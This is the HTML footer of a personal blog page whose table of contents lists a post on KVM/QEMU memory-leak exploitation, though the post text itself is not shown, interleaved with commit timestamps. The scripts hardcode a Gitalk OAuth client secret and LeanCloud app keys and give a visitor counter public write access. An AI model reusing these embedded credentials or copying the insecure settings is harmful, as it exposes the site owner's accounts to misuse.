< div class = "post-toc-content" > < ol class = "nav" > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#1-Intro" > < span class = "nav-text" > 1 Intro< / span > < / a > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#2-KVM-QEMU-Overview" > < span class = "nav-text" > 2 KVM/QEMU Overview< / span > < / a > < ol class = "nav-child" > < li class = "nav-item nav-level-3" > < a class = "nav-link" href = "#2-1-Workspace-Environment" > < span class = "nav-text" > 2.1 Workspace Environment< / span > < / a > < / li > < li class = "nav-item nav-level-3" > < a class = "nav-link" href = "#2-2-QEMU-Memory-Layout" > < span class = "nav-text" > 2.2 QEMU Memory Layout< / span > < / a > < / li > < li class = "nav-item nav-level-3" > < a class = "nav-link" href = "#2-3-Address-Translation" > < span class = "nav-text" > 2.3 Address Translation< / span > < / a > < / li > < / ol > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#3-Memory-Leak-Exploitation" > < span class = "nav-text" > 3 Memory Leak Exploitation< / span > < / a > < ol class = "nav-child" > < li class = "nav-item nav-level-3" > < a class = "nav-link" href = "#3-1-The-vulnerable-Code" > < span class = "nav-text" > 3.1 The vulnerable Code< / span > < / a > < / li > < li class = "nav-item nav-level-3" > < a class = "nav-link" href = "#3-2-Setting-up-the-Card" > < span class = "nav-text" > 3.2 Setting up the Card< / span > < / a > < / li > < li class = "nav-item nav-level-3" > < a class = "nav-link" href = "#3-3-Exploit" > < span class = "nav-text" > 3.3 Exploit< / span > < / a > < / li > < li class = "nav-item nav-level-3" > < a class = "nav-link" href = "#3-4-遇到的几个问题" > < span class = "nav-text" > 3.4 遇到的几个问题< / span > < / a > < / li > < / ol > < / li > < li class = "nav-item nav-level-2" > < a class = "nav-link" href = "#ref" > < span class = "nav-text" > ref< / span > < / a > < / li > < / ol > < / div >
2021-04-10 10:53:27 +00:00
< / div >
< / section >
<!-- /noindex -->
< / div >
< / aside >
< / div >
< / main >
< footer id = "footer" class = "footer" >
< div class = "footer-inner" >
< div class = "copyright" > © 2019 — < span itemprop = "copyrightYear" > 2021< / span >
< span class = "with-love" >
< i class = "fa fa-user" > < / i >
< / span >
< span class = "author" itemprop = "copyrightHolder" > Cool-Y< / span >
< span class = "post-meta-divider" > |< / span >
< span class = "post-meta-item-icon" >
< i class = "fa fa-area-chart" > < / i >
< / span >
2021-04-10 13:53:56 +00:00
< span title = "Site words total count" > 104.8k< / span >
2021-04-10 10:53:27 +00:00
< / div >
< div class = "powered-by" > 由 < a class = "theme-link" target = "_blank" href = "https://hexo.io" > Hexo< / a > 强力驱动< / div >
< div class = "busuanzi-count" >
< script async src = "//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" > < / script >
< span class = "site-uv" >
< i class = "fa fa-user" > < / i >
< span class = "busuanzi-value" id = "busuanzi_value_site_uv" > < / span >
< / span >
< span class = "site-pv" >
< i class = "fa fa-eye" > < / i >
< span class = "busuanzi-value" id = "busuanzi_value_site_pv" > < / span >
< / span >
< / div >
< / div >
< / footer >
< div class = "back-to-top" >
< i class = "fa fa-arrow-up" > < / i >
2021-04-10 19:19:48 +00:00
< span id = "scrollpercent" > < span > 0< / span > %< / span >
2021-04-10 10:53:27 +00:00
< / div >
2021-04-10 19:19:48 +00:00
< div id = "needsharebutton-float" >
< span class = "btn" >
< i class = "fa fa-share-alt" aria-hidden = "true" > < / i >
< / span >
< / div >
2021-04-10 10:53:27 +00:00
< / div >
< script type = "text/javascript" >
if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
window.Promise = null;
}
< / script >
< script type = "text/javascript" src = "/lib/jquery/index.js?v=2.1.3" > < / script >
< script type = "text/javascript" src = "/lib/fastclick/lib/fastclick.min.js?v=1.0.6" > < / script >
< script type = "text/javascript" src = "/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7" > < / script >
< script type = "text/javascript" src = "/lib/velocity/velocity.min.js?v=1.2.1" > < / script >
< script type = "text/javascript" src = "/lib/velocity/velocity.ui.min.js?v=1.2.1" > < / script >
< script type = "text/javascript" src = "/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5" > < / script >
< script type = "text/javascript" src = "/js/src/utils.js?v=5.1.4" > < / script >
< script type = "text/javascript" src = "/js/src/motion.js?v=5.1.4" > < / script >
< script type = "text/javascript" src = "/js/src/scrollspy.js?v=5.1.4" > < / script >
< script type = "text/javascript" src = "/js/src/post-details.js?v=5.1.4" > < / script >
< script type = "text/javascript" src = "/js/src/bootstrap.js?v=5.1.4" > < / script >
2021-04-10 12:37:40 +00:00
2021-04-10 12:40:26 +00:00
<!-- LOCAL: You can save these files to your site and update links -->
< link rel = "stylesheet" href = "https://unpkg.com/gitalk/dist/gitalk.css" >
< script src = "https://unpkg.com/gitalk/dist/gitalk.min.js" > < / script >
<!-- END LOCAL -->
< script type = "text/javascript" >
function renderGitalk(){
var gitalk = new Gitalk({
owner: 'Cool-Y',
repo: 'gitment-comments',
clientID: '180955a2c3ae3d966d9a',
clientSecret: '1c5db4da72df5e6fc318d12afe5f4406f7c54343',
admin: 'Cool-Y',
2021-04-10 12:47:46 +00:00
id: decodeURI(location.pathname),
2021-04-10 12:40:26 +00:00
distractionFreeMode: 'true'
});
gitalk.render('gitalk-container');
}
renderGitalk();
< / script >
2021-04-10 10:53:27 +00:00
< script src = "https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js" > < / script >
< script > AV . initialize ( "EWwoJgHNdlj6iBjiFlMcabUO-gzGzoHsz" , "x8FxDrYG79C8YFrTww9ljo8K" ) ; < / script >
< script >
function showTime(Counter) {
var query = new AV.Query(Counter);
var entries = [];
var $visitors = $(".leancloud_visitors");
$visitors.each(function () {
entries.push( $(this).attr("id").trim() );
});
query.containedIn('url', entries);
query.find()
.done(function (results) {
var COUNT_CONTAINER_REF = '.leancloud-visitors-count';
if (results.length === 0) {
$visitors.find(COUNT_CONTAINER_REF).text(0);
return;
}
for (var i = 0; i < results.length ; i + + ) {
var item = results[i];
var url = item.get('url');
var time = item.get('time');
var element = document.getElementById(url);
$(element).find(COUNT_CONTAINER_REF).text(time);
}
for(var i = 0; i < entries.length ; i + + ) {
var url = entries[i];
var element = document.getElementById(url);
var countSpan = $(element).find(COUNT_CONTAINER_REF);
if( countSpan.text() == '') {
countSpan.text(0);
}
}
})
.fail(function (object, error) {
console.log("Error: " + error.code + " " + error.message);
});
}
function addCount(Counter) {
var $visitors = $(".leancloud_visitors");
var url = $visitors.attr('id').trim();
var title = $visitors.attr('data-flag-title').trim();
var query = new AV.Query(Counter);
query.equalTo("url", url);
query.find({
success: function(results) {
if (results.length > 0) {
var counter = results[0];
counter.fetchWhenSave(true);
counter.increment("time");
counter.save(null, {
success: function(counter) {
var $element = $(document.getElementById(url));
$element.find('.leancloud-visitors-count').text(counter.get('time'));
},
error: function(counter, error) {
console.log('Failed to save Visitor num, with error message: ' + error.message);
}
});
} else {
var newcounter = new Counter();
/* Set ACL */
var acl = new AV.ACL();
acl.setPublicReadAccess(true);
acl.setPublicWriteAccess(true);
newcounter.setACL(acl);
/* End Set ACL */
newcounter.set("title", title);
newcounter.set("url", url);
newcounter.set("time", 1);
newcounter.save(null, {
success: function(newcounter) {
var $element = $(document.getElementById(url));
$element.find('.leancloud-visitors-count').text(newcounter.get('time'));
},
error: function(newcounter, error) {
console.log('Failed to create');
}
});
}
},
error: function(error) {
console.log('Error:' + error.code + " " + error.message);
}
});
}
$(function() {
var Counter = AV.Object.extend("Counter");
if ($('.leancloud_visitors').length == 1) {
addCount(Counter);
} else if ($('.post-title-link').length > 1) {
showTime(Counter);
}
});
< / script >
< script >
(function(){
var bp = document.createElement('script');
var curProtocol = window.location.protocol.split(':')[0];
if (curProtocol === 'https') {
bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
}
else {
bp.src = 'http://push.zhanzhang.baidu.com/push.js';
}
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(bp, s);
})();
< / script >
2021-04-10 19:19:48 +00:00
< link rel = "stylesheet" href = "/lib/needsharebutton/needsharebutton.css" >
2021-04-10 10:53:27 +00:00
2021-04-10 19:19:48 +00:00
< script src = "/lib/needsharebutton/needsharebutton.js" > < / script >
< script >
pbOptions = {};
pbOptions.iconStyle = "box";
pbOptions.boxForm = "horizontal";
pbOptions.position = "bottomCenter";
pbOptions.networks = "Weibo,Wechat,Douban,QQZone,Twitter,Facebook";
new needShareButton('#needsharebutton-postbottom', pbOptions);
flOptions = {};
flOptions.iconStyle = "box";
flOptions.boxForm = "horizontal";
flOptions.position = "middleRight";
flOptions.networks = "Weibo,Wechat,Douban,QQZone,Twitter,Facebook";
new needShareButton('#needsharebutton-float', flOptions);
< / script >
2021-04-10 10:53:27 +00:00
2021-04-10 19:19:48 +00:00
< script type = "text/javascript" src = "/js/src/js.cookie.js?v=5.1.4" > < / script >
< script type = "text/javascript" src = "/js/src/scroll-cookie.js?v=5.1.4" > < / script >
2021-04-10 10:53:27 +00:00
< / body >
< / html >
